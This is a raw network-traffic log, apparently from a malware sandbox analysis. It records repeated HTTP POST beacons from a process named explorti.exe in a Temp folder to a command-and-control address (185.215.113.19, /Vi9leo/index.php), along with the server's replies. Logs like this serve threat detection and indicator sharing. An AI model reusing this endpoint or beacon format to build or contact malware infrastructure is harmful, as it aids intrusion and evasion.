Jul 26, 2024 13:55:08.857299089 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:09.658246040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.8	49816	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:09.769483089 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:10.537667990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.8	49817	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:10.547035933 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:11.327347994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.8	49818	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:11.441735029 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:12.226031065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.8	49819	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:12.234683990 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:13.196721077 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 13:55:13.205890894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.8	49820	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:13.315979004 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:14.113172054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.8	49821	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:14.121756077 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:15.219131947 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 13:55:15.220873117 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.8	49822	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:15.332148075 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.8	49823	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:15.346729040 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:16.114075899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.8	49824	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:16.249116898 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:17.023746967 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.8	49825	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:17.033560991 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:17.819711924 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.8	49826	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:17.945322037 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:18.701006889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.8	49827	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:18.709311962 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:19.514708996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.8	49828	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:19.634857893 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:20.404468060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.8	49829	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:20.452569008 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:21.229559898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.8	49830	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:21.347528934 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:22.092497110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.8	49831	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:22.101588011 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:22.909909010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.8	49832	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:23.035332918 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.8	49833	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:23.051103115 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:23.853913069 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.8	49834	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:23.973237038 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:24.735496044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.8	49835	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:24.744421005 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:25.502295971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.8	49836	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:25.628542900 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:55:26.373938084 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.8	49837	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:55:26.384505033 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:55:27.138001919 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:55:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

